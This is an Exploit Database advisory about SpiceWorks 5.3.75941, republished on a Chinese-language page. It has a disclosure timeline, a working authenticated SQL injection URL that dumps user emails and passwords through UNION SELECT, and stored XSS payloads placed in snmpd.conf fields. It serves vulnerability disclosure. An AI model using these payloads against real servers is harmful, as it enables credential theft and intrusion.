SpiceWorks 5.3.75941 – Persistent Cross-Site Scripting / (Authenticated) SQL Injection

• Exploit Database
• 119 阅读

• 作者： dookie
  日期： 2012-07-23
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20063/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  Product: SpiceWorks Version: 5.3.75941 Vendor Site: http://www.spiceworks.com/community/ Software Download Link: http://www.spiceworks.com/download/?utm_source=comm-secondary-link&utm_medium=website&utm_campaign=homepage Installer Filename: Spiceworks.exeMD5: 023bd361c0f9402dc07adbc5a72fe31d Contact: http://www.spiceworks.com/contact/   Timeline:   04 Jun 2012: Vulnerability reported to CERT 08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012 23 Jul 2012: Updated received from CERT: No response from vendor 23 Jul 2012: Public Disclosure   SQL Injection (Post-Authentication):   http://server/api_v2.json?queries[device][class]=Device&queries[device][select]=id,b_manufacturer,manufacturer,b_model,model,operating_system,device_type&queries[device][conditions]=id=14%29%20UNION%20SELECT%20NULL,%20NULL,%20NULL,%20email,%20NULL,%20NULL,%20password%20from%20users%20where%20id=1--   Stored XSS:   An attacker can configure their snmpd.conf file to contain malicious JavaScript as shown in the proof of concept below:   rocommunity public com2sec local localhost public view systemview included .1.3.6.1.2.1.1 viewsystemviewincluded .1.3.6.1.2.1.25.1.1 viewsystemviewincluded .1 80 syslocation <script>alert(&apos;location&apos;)</script> syscontact <script>alert(&apos;contact&apos;)</script> sysName dook<script>alert(&apos;name&apos;)</script>